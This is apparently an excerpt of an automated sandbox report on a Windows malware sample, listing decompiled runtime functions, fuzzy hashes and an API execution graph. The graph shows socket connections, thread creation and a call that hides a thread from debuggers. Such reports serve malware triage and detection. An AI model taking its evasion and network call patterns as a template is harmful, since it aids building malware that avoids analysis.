                            • API ID: __encode_pointer__invalid_parameter
                            • String ID: 2 <= radix && radix <= 36$f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c$xtow_s
                            • API String ID: 1891725282-3510662743
                            • Opcode ID: 6aeca979d55f4d88afd38f1de064b94d875276e8d60bf6503d074b4f327bd7ba
                            • Instruction ID: f49c66fd29836c007ef7925124d75894cfe99151e245a1efd7ee498934f59a42
                            • Opcode Fuzzy Hash: 6aeca979d55f4d88afd38f1de064b94d875276e8d60bf6503d074b4f327bd7ba
                            • Instruction Fuzzy Hash: E8D012B1FDC20825F22065415C03F922E004712B49F2141B7F9033A2D3D5BF146062BF
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 84%
                            			E004104AA(intOrPtr __eax) {
                            				void* _t10;
                            				intOrPtr _t11;
                            				intOrPtr _t16;
                            				void* _t21;
                            
                            				 *((intOrPtr*)(_t21 - 8)) = __eax;
                            				if( *((intOrPtr*)(_t21 - 8)) == 0) {
                            					L2:
                            					E00410510();
                            					_t10 = 0;
                            				} else {
                            					_push( *((intOrPtr*)(_t21 - 8)));
                            					_t11 =  *0x60a9d8; // 0x4
                            					_push(_t11);
                            					_t16 =  *0x632ad4; // 0xee91e9b5
                            					if( *((intOrPtr*)(E00410200(_t16)))() != 0) {
                            						E00410570(_t16,  *((intOrPtr*)(_t21 - 8)), 0);
                            						 *((intOrPtr*)( *((intOrPtr*)(_t21 - 8)))) = GetCurrentThreadId();
                            						 *((intOrPtr*)( *((intOrPtr*)(_t21 - 8)) + 4)) = 0xffffffff;
                            						_t10 = 1;
                            					} else {
                            						goto L2;
                            					}
                            				}
                            				return _t10;
                            			}







                            0x004104ad
                            0x004104b4
                            0x004104d5
                            0x004104d5
                            0x004104da
                            0x004104b6
                            0x004104b9
                            0x004104ba
                            0x004104bf
                            0x004104c0
                            0x004104d3
                            0x004104e4
                            0x004104f5
                            0x004104fa
                            0x00410501
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004104d3
                            0x00410509

                            APIs
                            • __encode_pointer.LIBCMTD ref: 004104C7
                              • Part of subcall function 00410200: TlsGetValue.KERNEL32(00000005,00410476,F691E9B5), ref: 00410215
                              • Part of subcall function 00410200: TlsGetValue.KERNEL32(00000005,00000004), ref: 00410236
                              • Part of subcall function 00410200: __crt_wait_module_handle.LIBCMTD ref: 0041024C
                              • Part of subcall function 00410200: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00410266
                            • __mtterm.LIBCMTD ref: 004104D5
                            • __initptd.LIBCMTD ref: 004104E4
                            • GetCurrentThreadId.KERNEL32 ref: 004104EC
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: Value$AddressCurrentProcThread__crt_wait_module_handle__encode_pointer__initptd__mtterm
                            • String ID:
                            • API String ID: 1673568325-0
                            • Opcode ID: 58a6d7d5467568c2be3edd66179b6750a85d7e0e907d75766569a7b7789cf334
                            • Instruction ID: 7dd2e60229a4f01348382bcd1d10e6602593eebe682236705e0122473f4febb6
                            • Opcode Fuzzy Hash: 58a6d7d5467568c2be3edd66179b6750a85d7e0e907d75766569a7b7789cf334
                            • Instruction Fuzzy Hash: B8F0B4B4A00205BBC710EFA4DC816DFBB71AB48314F104299F905A7391EA75D5C0CBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 0040C2F4
                            • _CrtCheckMemory(), xrefs: 0040C2E8
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: CheckMemory
                            • String ID: _CrtCheckMemory()$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
                            • API String ID: 2067751306-2660621803
                            • Opcode ID: 431dc643eca537113b0f4834f27ad962c1a9b4d6646ad9a6494bd298d7658b0c
                            • Instruction ID: 06f23a89ae9568b2075e5d7787c1d880a0c8a93a3f6affb714320c5db787684b
                            • Opcode Fuzzy Hash: 431dc643eca537113b0f4834f27ad962c1a9b4d6646ad9a6494bd298d7658b0c
                            • Instruction Fuzzy Hash: A6F02B3054220ECBEF248F12EED27363255E780308F20E737EC04B62D1E27CA450458E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:3.6%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:3.7%
                            Total number of Nodes:733
                            Total number of Limit Nodes:35
                            execution_graph 37910 4086c1 37911 4086cd _strlen 37910->37911 37914 411ddd 37911->37914 37913 4086da std::_Throw_Cpp_error 37915 411ded 37914->37915 37917 411df1 37915->37917 37918 411c1d 37915->37918 37917->37913 37919 411c72 37918->37919 37920 411c29 37918->37920 37938 582131 std::invalid_argument::invalid_argument RaiseException __CxxThrowException@8 37919->37938 37922 411c39 37920->37922 37923 411c2e 37920->37923 37926 411c37 37922->37926 37934 411bc8 37922->37934 37928 4121ec __EH_prolog 37923->37928 37926->37917 37929 41220f 37928->37929 37939 40f48d 37929->37939 37931 411bc8 collate 11 API calls 37932 4122c0 37931->37932 37932->37926 37933 41224f 37933->37931 37935 411bfd 37934->37935 37936 411bd8 37934->37936 37935->37926 37936->37935 37956 40f4e4 37936->37956 37940 40f497 37939->37940 37941 40f49b 37939->37941 37940->37933 37942 40f4d7 37941->37942 37944 40f4c5 37941->37944 37943 689e2f new 9 API calls 37942->37943 37945 40f4cb 37943->37945 37947 689e2f 37944->37947 37945->37933 37948 689e34 _Yarn 37947->37948 37949 689e60 37948->37949 37953 6a518a 7 API calls 2 library calls 37948->37953 37954 68b588 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 37948->37954 37955 5820f4 __EH_prolog RaiseException Concurrency::cancel_current_task __CxxThrowException@8 37948->37955 37949->37945 37953->37948 37954->37948 37957 40f4fb 37956->37957 37963 40f4f6 37956->37963 37958 40f523 37957->37958 37957->37963 37958->37935 37960 694c65 37965 694c73 11 API calls _abort 37960->37965 37962 694c72 37964 694bcb 11 API calls 3 library calls 37963->37964 37964->37960 37965->37962 37970 452f81 __EH_prolog socket 37971 452fe6 _abort 37970->37971 37972 452fc1 37970->37972 37974 452ff2 htons connect 37971->37974 37983 452ec0 __EH_prolog WSAStartup gethostbyname inet_ntoa 37972->37983 37975 453031 getsockname 37974->37975 37976 453021 37974->37976 37977 453022 closesocket 37975->37977 37978 45304d closesocket inet_ntop 37975->37978 37976->37977 37979 45302a 37977->37979 37978->37979 37981 452fc8 37978->37981 37984 452ec0 __EH_prolog WSAStartup gethostbyname inet_ntoa 37979->37984 37982 45302f 37982->37981 37983->37981 37984->37982 37989 413f49 37996 58346a 37989->37996 37992 413f73 37994 413f75 std::_Cnd_waitX 37992->37994 37995 413f88 37992->37995 37994->37992 38000 694f05 37996->38000 37999 582e5d 18 API calls std::_Throw_Cpp_error 37999->37992 38001 694f12 _free 38000->38001 38002 694f26 38000->38002 38020 694c46 11 API calls __vfwprintf_l 38001->38020 38011 694e30 38002->38011 38006 694f3b CreateThread 38007 694f66 __dosmaperr 38006->38007 38008 694f5a GetLastError 38006->38008 38040 694d25 38006->38040 38021 694da2 38007->38021 38008->38007 38010 413f5d 38010->37992 38010->37999 38029 6a06c2 38011->38029 38013 694e40 38034 6a071f 38013->38034 38015 694e49 38016 694e68 38015->38016 38017 694e50 GetModuleHandleExW 38015->38017 38018 694da2 __Thrd_start 4 API calls 38016->38018 38017->38016 38019 694e72 38018->38019 38019->38006 38019->38007 38020->38010 38022 694daf 38021->38022 38023 694dd3 38021->38023 38024 694dbe 38022->38024 38025 694db5 CloseHandle 38022->38025 38023->38010 38026 694dcd 38024->38026 38027 694dc4 FreeLibrary 38024->38027 38025->38024 38028 6a071f _free 2 API calls 38026->38028 38027->38026 38028->38023 38032 6a06cf __Cnd_init 38029->38032 38030 6a06fa RtlAllocateHeap 38031 6a070d _free 38030->38031 38030->38032 38031->38013 38032->38030 38032->38031 38039 6a518a 7 API calls 2 library calls 38032->38039 38035 6a072a RtlFreeHeap 38034->38035 38038 6a0753 _free 38034->38038 38036 6a073f _free 38035->38036 38035->38038 38037 6a0745 GetLastError 38036->38037 38037->38038 38038->38015 38039->38032 38041 694d31 38040->38041 38042 694d38 GetLastError ExitThread 38041->38042 38043 694d45 38041->38043 38051 413fbc 38043->38051 38056 41487e __EH_prolog SetEvent 38043->38056 38044 694d7c 38059 694f8a 38044->38059 38062 41eb4d __EH_prolog 38051->38062 38052 413fc6 38064 583288 6 API calls 4 library calls 38052->38064 38054 413fcb 38054->38044 38057 4148a4 SetEvent SleepEx 38056->38057 38057->38044 38065 694dd9 38059->38065 38061 694f97 38063 41eb6c _Receive_impl 38062->38063 38063->38052 38064->38054 38067 694de4 38065->38067 38066 694de8 ExitThread 38067->38066 38068 694e19 38067->38068 38069 694e12 CloseHandle 38067->38069 38068->38066 38070 694e25 FreeLibraryAndExitThread 38068->38070 38069->38068 38075 5cd610 38076 694f05 __Thrd_start 37 API calls 38075->38076 38077 5cd62b 38076->38077 38078 5cd634 38077->38078 38079 5cd657 ResumeThread 38077->38079 38080 5cd650 CloseHandle 38077->38080 38080->38079 38081 40180d 38082 401819 _strlen 38081->38082 38083 411ddd 17 API calls 38082->38083 38084 401826 std::_Throw_Cpp_error 38083->38084 38085 42100c 38090 40f2ec ___std_exception_copy 38085->38090 38087 421019 38091 68e3de 38087->38091 38089 421036 38090->38087 38092 68e3fe 38091->38092 38093 68e430 RaiseException 38092->38093 38093->38089 38102 40f08f 38105 571f0b __EH_prolog 38102->38105 38104 40f09b std::_Throw_Cpp_error 38106 571f32 38105->38106 38107 689e2f new 9 API calls 38106->38107 38109 571f5b 38106->38109 38112 5717f8 12 API calls 2 library calls 38106->38112 38107->38106 38111 571f7d 38109->38111 38113 420dd7 59 API calls 2 library calls 38109->38113 38111->38104 38112->38106 38113->38111 38118 419150 38119 68e3de __CxxThrowException@8 RaiseException 38118->38119 38120 419159 __EH_prolog gethostbyname 38119->38120 38122 4192a7 38120->38122 38129 4191a2 shared_ptr 38120->38129 38121 4192fb 38172 41b490 11 API calls collate 38121->38172 38122->38121 38216 44e381 18 API calls 2 library calls 38122->38216 38125 419318 38127 411bc8 collate 11 API calls 38125->38127 38126 4192dc 38217 41b490 11 API calls collate 38126->38217 38133 41932c 38127->38133 38131 411bc8 collate 11 API calls 38129->38131 38130 4192e9 38132 411bc8 collate 11 API calls 38130->38132 38134 419267 38131->38134 38132->38121 38173 416b1f 38133->38173 38136 411bc8 collate 11 API calls 38134->38136 38138 419276 38136->38138 38139 411bc8 collate 11 API calls 38138->38139 38141 419284 38139->38141 38140 41934d 38218 464e5d __EH_prolog gethostbyname inet_ntoa 38140->38218 38144 411bc8 collate 11 API calls 38141->38144 38142 4196e9 shared_ptr 38146 419293 38144->38146 38145 41935b 38219 41b490 11 API calls collate 38145->38219 38148 419368 38149 411bc8 collate 11 API calls 38148->38149 38168 419379 38149->38168 38151 416b1f 4 API calls 38151->38168 38166 411ddd 17 API calls 38166->38168 38168->38142 38168->38151 38168->38166 38169 41cecb 7 API calls 38168->38169 38179 415489 72 API calls new 38168->38179 38180 416c3e 9 API calls 38168->38180 38181 41552b 38168->38181 38185 41cf6b __EH_prolog 38168->38185 38190 41cfdb 38168->38190 38193 41d040 38168->38193 38196 41d00f WSAGetLastError setsockopt 38168->38196 38197 41ae75 38168->38197 38203 41d2e4 6 API calls 38168->38203 38204 41e8e4 38168->38204 38208 416179 WSAGetLastError closesocket ioctlsocket closesocket setsockopt 38168->38208 38209 41d19e 6 API calls 38168->38209 38210 41ae31 WSAGetLastError 38168->38210 38211 41afdc 38168->38211 38220 4161f3 6 API calls 38168->38220 38169->38168 38170 41552b 21 API calls 38171 4196cc 38170->38171 38171->38168 38171->38170 38221 416fd1 5 API calls shared_ptr 38171->38221 38172->38125 38174 416b32 38173->38174 38222 416aad 38174->38222 38176 416b42 38177 416b49 38176->38177 38225 41698e 38176->38225 38177->38140 38177->38168 38179->38168 38180->38168 38182 415553 38181->38182 38237 4145f9 38182->38237 38184 41555e 38184->38168 38264 41ee30 __EH_prolog 38185->38264 38187 41cf90 38273 41e7dc __EH_prolog 38187->38273 38430 415a77 38190->38430 38192 41cffe 38192->38168 38194 415a77 2 API calls 38193->38194 38195 41d063 38194->38195 38195->38168 38196->38168 38198 41aeac 38197->38198 38199 41ae8f 38197->38199 38202 41aecc 38198->38202 38438 4156d7 38198->38438 38435 41b656 38199->38435 38202->38168 38203->38168 38206 41e909 38204->38206 38205 41e979 38205->38168 38206->38205 38466 41eea1 38206->38466 38208->38168 38209->38168 38210->38168 38528 41746d 38211->38528 38215 41b01b 38215->38171 38216->38126 38217->38130 38218->38145 38219->38148 38220->38168 38221->38171 38228 415c9c WSASetLastError 38222->38228 38224 416ae3 38224->38176 38226 415c9c 4 API calls 38225->38226 38227 4169bb 38226->38227 38227->38177 38230 415cbf ___crtLCMapStringA _strlen 38228->38230 38229 415cc4 38229->38224 38230->38229 38231 415cf2 MultiByteToWideChar WSAStringToAddressW 38230->38231 38233 41556d 38231->38233 38234 415592 38233->38234 38235 41557b 38233->38235 38236 415597 WSAGetLastError 38234->38236 38235->38229 38236->38235 38238 41461d 38237->38238 38241 41462b 38238->38241 38243 414c58 __EH_prolog 38238->38243 38239 414654 DeleteCriticalSection 38240 414667 _Receive_impl 38239->38240 38240->38184 38241->38239 38241->38240 38244 414c92 38243->38244 38245 414c7b SetWaitableTimer 38243->38245 38246 414c99 38244->38246 38257 414cb3 38244->38257 38245->38244 38262 414f2a 11 API calls 38246->38262 38248 414ca0 38251 4146d0 5 API calls 38248->38251 38249 414d80 38250 414d8f 38249->38250 38258 4146d0 WaitForMultipleObjects CloseHandle 38249->38258 38250->38238 38253 414ca7 38251->38253 38263 41b25a CloseHandle _Receive_impl 38253->38263 38255 414d2e GetQueuedCompletionStatus 38255->38257 38256 414caf 38256->38257 38257->38249 38257->38255 38259 414711 TerminateThread 38258->38259 38260 414719 QueueUserAPC WaitForSingleObject 38258->38260 38261 41472f 38259->38261 38260->38261 38261->38250 38262->38248 38263->38256 38288 41f385 38264->38288 38268 41ee5a 38293 41f1f6 __EH_prolog 38268->38293 38270 41ee79 38295 416092 __EH_prolog 38270->38295 38272 41ee88 38272->38187 38374 417081 38273->38374 38275 41e7f9 38383 41ec3f __EH_prolog 38275->38383 38277 41e80d 38278 41ec3f 72 API calls 38277->38278 38279 41e821 38278->38279 38387 41b39f __EH_prolog 38279->38387 38281 41e835 38282 41b39f 10 API calls 38281->38282 38283 41e86b 38282->38283 38390 41ebe0 16 API calls 38283->38390 38285 41e8b5 38391 41ebe0 16 API calls 38285->38391 38287 41cfb5 38287->38168 38289 41f39e 38288->38289 38300 414441 __EH_prolog EnterCriticalSection 38289->38300 38291 41ee4e 38292 41f0f6 __EH_prolog 38291->38292 38292->38268 38294 41f24a shared_ptr 38293->38294 38294->38270 38372 41b2c6 38295->38372 38297 4160b5 EnterCriticalSection 38298 4160db 38297->38298 38299 4160de LeaveCriticalSection 38297->38299 38298->38299 38299->38272 38301 414483 LeaveCriticalSection 38300->38301 38302 41446b 38300->38302 38310 41f2a2 __EH_prolog 38301->38310 38302->38301 38306 4144f2 LeaveCriticalSection 38302->38306 38315 414413 type_info::operator== 38302->38315 38305 4144bc 38307 4144d2 38305->38307 38316 414413 type_info::operator== 38305->38316 38306->38291 38307->38306 38311 689e2f new 9 API calls 38310->38311 38312 41f2b5 38311->38312 38317 41f2d9 __EH_prolog 38312->38317 38315->38302 38316->38305 38322 41e7aa 38317->38322 38323 41e7c3 38322->38323 38324 414441 71 API calls 38323->38324 38325 41e7d8 38324->38325 38326 41f3c4 38325->38326 38329 4152cd __EH_prolog EnterCriticalSection 38326->38329 38328 414494 EnterCriticalSection 38328->38305 38330 415306 CreateWaitableTimerW 38329->38330 38331 415369 38329->38331 38333 415347 SetWaitableTimer 38330->38333 38334 415316 GetLastError 38330->38334 38332 4153c9 LeaveCriticalSection 38331->38332 38335 689e2f new 9 API calls 38331->38335 38332->38328 38333->38331 38339 415323 38334->38339 38336 415376 38335->38336 38337 689e2f new 9 API calls 38336->38337 38338 41538f 38337->38338 38345 414734 CreateEventW 38338->38345 38367 41037a 9 API calls 38339->38367 38342 415344 38342->38333 38346 414797 CreateEventW 38345->38346 38347 41475b GetLastError 38345->38347 38348 4147b0 GetLastError 38346->38348 38364 4147e6 38346->38364 38355 41476b 38347->38355 38357 4147c0 38348->38357 38349 694f05 __Thrd_start 37 API calls 38350 414806 38349->38350 38351 414865 38350->38351 38352 414816 GetLastError 38350->38352 38353 414875 38351->38353 38354 414869 WaitForSingleObject FindCloseChangeNotification 38351->38354 38356 414827 38352->38356 38368 41b25a CloseHandle _Receive_impl 38353->38368 38354->38353 38369 41037a 9 API calls 38355->38369 38359 41482b CloseHandle 38356->38359 38360 41482e 38356->38360 38370 41037a 9 API calls 38357->38370 38359->38360 38363 414837 CloseHandle 38360->38363 38365 41483c 38360->38365 38362 414791 38362->38346 38363->38365 38364->38349 38371 41037a 9 API calls 38365->38371 38367->38342 38368->38332 38369->38362 38370->38364 38371->38351 38373 41b305 shared_ptr 38372->38373 38373->38297 38392 649760 38374->38392 38376 417093 38379 4170c5 38376->38379 38413 410a26 __EH_prolog 38376->38413 38378 41709f 38414 41037a 9 API calls 38378->38414 38403 5d7780 38379->38403 38382 4170fd 38382->38275 38384 41ec69 38383->38384 38422 41f0c4 38384->38422 38386 41ec7e 38386->38277 38426 411b8c 38387->38426 38389 41b3c9 _abort 38389->38281 38390->38285 38391->38287 38393 649769 38392->38393 38397 649783 38392->38397 38393->38376 38394 649788 38394->38376 38396 6497f6 38396->38376 38397->38394 38401 6497db 38397->38401 38416 648bc0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38397->38416 38399 649b42 38399->38401 38417 5db790 5 API calls 2 library calls 38399->38417 38402 649ba6 38401->38402 38415 649210 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38401->38415 38402->38376 38418 5d6910 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38403->38418 38405 5d7791 38409 5d77a4 38405->38409 38419 5d6910 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38405->38419 38408 5d7818 38421 5d6440 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38408->38421 38412 5d77fb 38409->38412 38420 5d6440 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38409->38420 38411 5d7820 38411->38382 38412->38382 38413->38378 38414->38379 38415->38396 38416->38399 38417->38401 38418->38405 38419->38409 38420->38408 38421->38411 38423 41f0dd 38422->38423 38424 414441 71 API calls 38423->38424 38425 41f0f2 38424->38425 38425->38386 38427 411ba4 38426->38427 38428 411ba8 38426->38428 38427->38389 38429 40f48d 9 API calls 38428->38429 38429->38427 38431 415a82 38430->38431 38433 415a94 38430->38433 38431->38192 38432 415af8 setsockopt 38434 41556d WSAGetLastError 38432->38434 38433->38431 38433->38432 38434->38431 38441 416319 __EH_prolog 38435->38441 38437 41b67b 38437->38198 38461 41569d 38438->38461 38440 4156ed 38440->38202 38442 416333 38441->38442 38443 41634c 38441->38443 38459 41cbc3 __EH_prolog 38442->38459 38451 415a23 WSASocketW 38443->38451 38447 41633f 38447->38437 38449 416388 38449->38447 38460 41cbfb 11 API calls shared_ptr 38449->38460 38452 41556d WSAGetLastError 38451->38452 38453 415a4c 38452->38453 38454 415a51 38453->38454 38455 415a5a setsockopt 38453->38455 38454->38447 38456 414d9d CreateIoCompletionPort 38454->38456 38455->38454 38457 414dba GetLastError 38456->38457 38458 414dc7 38456->38458 38457->38458 38458->38449 38459->38447 38460->38447 38462 4156b7 connect 38461->38462 38463 4156a5 38461->38463 38464 41556d WSAGetLastError 38462->38464 38463->38440 38465 4156d2 38464->38465 38465->38440 38474 41eec4 38466->38474 38468 41efa6 38503 417208 __EH_prolog __EH_prolog 38468->38503 38469 41efa8 38469->38468 38472 41efad 38469->38472 38476 41f024 2 API calls 38472->38476 38473 41efec 38473->38206 38474->38468 38474->38469 38479 41727c 38474->38479 38495 41f024 38474->38495 38499 41ea79 38474->38499 38477 41efd0 38476->38477 38502 417208 __EH_prolog __EH_prolog 38477->38502 38480 41728f 38479->38480 38481 417300 38480->38481 38482 4172cc 38480->38482 38484 417305 38481->38484 38487 417326 38481->38487 38504 410a26 __EH_prolog 38482->38504 38485 417318 38484->38485 38486 41730c 38484->38486 38506 410a26 __EH_prolog 38485->38506 38505 41ce3e __EH_prolog 38486->38505 38490 4173bb 38487->38490 38491 4173af 38487->38491 38493 4172d1 38487->38493 38490->38493 38508 41ce3e __EH_prolog 38490->38508 38507 41cbc3 __EH_prolog 38491->38507 38493->38474 38497 41f042 38495->38497 38496 41f0b7 38496->38474 38497->38496 38509 415954 38497->38509 38518 415810 38499->38518 38501 41eaaf 38501->38474 38502->38473 38503->38473 38504->38493 38505->38493 38506->38493 38507->38493 38508->38493 38510 415976 38509->38510 38512 415965 38509->38512 38510->38512 38515 4158e1 WSASend 38510->38515 38512->38497 38513 4159b3 38513->38512 38514 4158e1 2 API calls 38513->38514 38514->38513 38516 41556d WSAGetLastError 38515->38516 38517 41590d 38516->38517 38517->38513 38522 415835 38518->38522 38523 415821 38518->38523 38520 4158cf 38527 41cbc3 __EH_prolog 38520->38527 38522->38520 38522->38523 38524 415782 WSARecv 38522->38524 38523->38501 38525 41556d WSAGetLastError 38524->38525 38526 4157b5 38525->38526 38526->38522 38527->38523 38542 411b0e 38528->38542 38531 411b0e 11 API calls 38532 4174ae 38531->38532 38546 41b6c3 38532->38546 38534 4174c1 38535 41b6c3 7 API calls 38534->38535 38536 4174d4 38535->38536 38550 41711a 38536->38550 38539 41c22d 38563 4160ff __EH_prolog 38539->38563 38541 41c264 shared_ptr 38541->38215 38543 411b25 38542->38543 38544 411b16 38542->38544 38543->38531 38545 40f4e4 std::_Deallocate 11 API calls 38544->38545 38545->38543 38547 41b6f4 38546->38547 38556 41c2a0 38547->38556 38549 41b703 38549->38534 38555 41713b 38550->38555 38551 41717b 38553 417188 38551->38553 38562 649210 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38551->38562 38553->38539 38555->38551 38561 5d6440 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38555->38561 38557 41c2c6 38556->38557 38559 41c2b2 38556->38559 38560 41d6fa 7 API calls 38557->38560 38559->38549 38560->38559 38561->38551 38562->38553 38568 4163fe 38563->38568 38565 41611a EnterCriticalSection 38567 416135 LeaveCriticalSection 38565->38567 38567->38541 38569 41640d 38568->38569 38571 416447 38568->38571 38572 4155bd 38569->38572 38571->38565 38573 415694 38572->38573 38576 4155d5 38572->38576 38573->38571 38574 415613 closesocket 38575 41556d WSAGetLastError 38574->38575 38577 415629 38575->38577 38576->38574 38578 415a77 2 API calls 38576->38578 38577->38573 38580 415667 ioctlsocket closesocket 38577->38580 38579 415610 38578->38579 38579->38574 38581 41556d WSAGetLastError 38580->38581 38581->38573 38590 430b17 38591 68e3de __CxxThrowException@8 RaiseException 38590->38591 38592 430b20 __EH_prolog 38591->38592 38593 430b4c shared_ptr 38592->38593 38618 47da23 __EH_prolog 38619 47da57 38618->38619 38620 47dacf GetModuleHandleA GetProcAddress 38619->38620 38621 47db0b 38620->38621 38622 47daea shared_ptr 38620->38622 38623 47db16 GetCurrentThread 38621->38623 38624 47db1c NtSetInformationThread 38621->38624 38623->38624 38624->38622 38629 40f0e6 38632 4ac8dd __EH_prolog 38629->38632 38631 40f0f9 std::_Throw_Cpp_error 38633 4ac8fa 38632->38633 38636 4af07a 38633->38636 38645 4227d5 38636->38645 38640 4af099 38641 4af0b2 38640->38641 38657 4226ae __EH_prolog 38640->38657 38644 4ac949 38641->38644 38663 58459f std::_Lockit::_Lockit std::_Lockit::~_Lockit 38641->38663 38644->38631 38646 4226ae 20 API calls 38645->38646 38647 422809 38646->38647 38648 689e2f new 9 API calls 38647->38648 38649 422810 38648->38649 38664 584267 38649->38664 38651 42281a 38652 4afd21 __EH_prolog 38651->38652 38677 422763 __EH_prolog 38652->38677 38656 4afd41 std::ios_base::_Ios_base_dtor 38656->38640 38658 422753 38657->38658 38661 4226cf 38657->38661 38658->38641 38659 68e3de __CxxThrowException@8 RaiseException 38659->38661 38660 4b03d1 __EH_prolog 38660->38661 38661->38659 38661->38660 38662 42224c 17 API calls 38661->38662 38662->38661 38663->38644 38674 68a4e0 38664->38674 38666 584273 std::_Lockit::_Lockit 38667 58428b 38666->38667 38673 584299 _Yarn 38666->38673 38675 584407 9 API calls 2 library calls 38667->38675 38669 5842e5 std::_Lockit::~_Lockit 38670 5842f4 messages 38669->38670 38670->38651 38671 584291 38676 58442c _Atexit 38671->38676 38673->38669 38674->38666 38675->38671 38676->38673 38678 422784 38677->38678 38679 4b02e0 __EH_prolog std::_Lockit::_Lockit 38678->38679 38689 4211a8 __EH_prolog 38679->38689 38681 4b0310 std::locale::_Getfacet 38682 4b0367 std::_Lockit::~_Lockit 38681->38682 38688 4b0323 38681->38688 38694 4219c9 __EH_prolog 38681->38694 38682->38656 38684 4b0350 38700 584233 9 API calls new 38684->38700 38685 4b0333 38685->38684 38687 68e3de __CxxThrowException@8 RaiseException 38685->38687 38687->38684 38688->38682 38690 4211e6 38689->38690 38691 4211bd std::_Lockit::_Lockit 38689->38691 38690->38681 38692 4211da std::_Lockit::~_Lockit 38691->38692 38693 4211cd 38691->38693 38692->38690 38693->38692 38695 4219e4 38694->38695 38699 421a39 38694->38699 38696 689e2f new 9 API calls 38695->38696 38695->38699 38697 4219f0 messages 38696->38697 38701 421059 std::_Lockit::~_Lockit std::_Locinfo::_Locinfo_dtor 38697->38701 38699->38685 38700->38688 38701->38699 38706 6a4904 38709 6a4713 38706->38709 38708 6a4915 38710 6a471f 38709->38710 38711 6a4738 38710->38711 38712 6a4726 38710->38712 38731 6a0dbb EnterCriticalSection 38711->38731 38729 68b6ff GetModuleHandleW 38712->38729 38715 6a472b 38715->38711 38730 6a486d 8 API calls __Thrd_sleep 38715->38730 38716 6a47dd 38738 6a481d LeaveCriticalSection _abort 38716->38738 38719 6a47f6 38722 6a47fa 38719->38722 38723 6a4826 38719->38723 38720 6a4737 38720->38711 38721 6a473f 38721->38716 38724 6a47cc 38721->38724 38732 6a5f6a 38721->38732 38739 6a482c 12 API calls _abort 38722->38739 38723->38708 38727 6a5f6a _abort 15 API calls 38724->38727 38727->38716 38729->38715 38730->38720 38731->38721 38733 6a5f99 38732->38733 38734 6a5fb5 38732->38734 38733->38734 38740 4090d7 38733->38740 38752 68a492 38734->38752 38736 6a5fc2 38736->38724 38738->38719 38740->38733 38741 4d031b 38740->38741 38742 689e2f new 9 API calls 38741->38742 38743 4d0335 _abort 38742->38743 38743->38743 38744 4d0395 GetModuleHandleA 38743->38744 38745 4d03f2 38744->38745 38745->38745 38746 4d0415 GetProcAddress 38745->38746 38747 4d043d _abort 38746->38747 38747->38747 38748 4d04ca GetModuleHandleA GetProcAddress 38747->38748 38749 4d04e6 GetNativeSystemInfo 38748->38749 38750 4d04f2 GetSystemInfo 38748->38750 38751 4d0500 _Receive_impl 38749->38751 38750->38751 38751->38733 38753 68a49b 38752->38753 38754 68a49d IsProcessorFeaturePresent 38752->38754 38753->38736 38756 68a826 38754->38756 38759 68a7ea SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38756->38759 38758 68a909 38758->38736 38759->38758 38760 434fec __EH_prolog 38762 43500e 38760->38762 38764 41369b __EH_prolog 38762->38764 38772 41cecb 38762->38772 38765 4136d6 38764->38765 38766 4136df 38764->38766 38765->38766 38767 4136fe GetSystemTimes 38765->38767 38766->38762 38767->38766 38768 413714 GetCurrentProcess GetProcessTimes 38767->38768 38768->38766 38770 413735 38768->38770 38769 4137e3 GetTickCount64 38769->38766 38770->38769 38771 4137ac 38770->38771 38771->38769 38775 41cee0 